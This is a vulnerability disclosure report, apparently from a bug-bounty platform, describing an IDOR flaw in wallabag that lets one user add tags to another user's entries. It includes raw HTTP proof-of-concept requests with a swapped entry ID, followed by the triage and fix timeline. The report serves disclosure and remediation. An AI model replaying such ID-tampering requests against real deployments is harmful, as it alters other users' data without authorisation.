IDOR Vulnerability Allows add tag entry user other in wallabag/wallabag

Valid

Reported on

Feb 3rd 2023

Description

IDOR Vulnerability Allows add tag entry user other, allows adding tags to any user, since there is no user authentication. And not limiting the input causes the entry interface to break

Proof of Concept

Step 1. User A manages entry id 6

Step 2. User B manages entry id 7

Step 3. Login user A, add tag for this user entry

eg: demo user A

POST /new-tag/6 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM

Step 4. Change the ID to 7, now you can add a tag to the user's entry

POST /new-tag/7 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM

Step 5. Input value is not limited, then input character > 200 makes the interface broken

Impact

an attacker add tag by user other, interface broken

References

We are processing your report and will contact the wallabag team within 24 hours. 2 months ago
We have contacted a member of the wallabag team and are waiting to hear back 2 months ago
wallabag/wallabag maintainer has acknowledged this report 2 months ago
Jérémy Benoist validated this vulnerability 2 months ago
Juy Lang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jérémy Benoist marked this as fixed in 2.5.4 with commit acd285 2 months ago
Jérémy Benoist has been awarded the fix bounty
This vulnerability has been assigned a CVE
Jérémy Benoist published this vulnerability 2 months ago
wallabag/wallabag maintainer gave praise 2 months ago
Thank you @juylang !
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Juy Lang
a month ago

Researcher

I see the CVE has not been assigned. Please help me!!

Ben Harvie
a month ago

Admin

Hey, it looks like our system bugged and your CVE was stuck in an assigned state, we have now published the CVE, please allow some time for Mitre to update it on their side. Thanks!

to join this conversation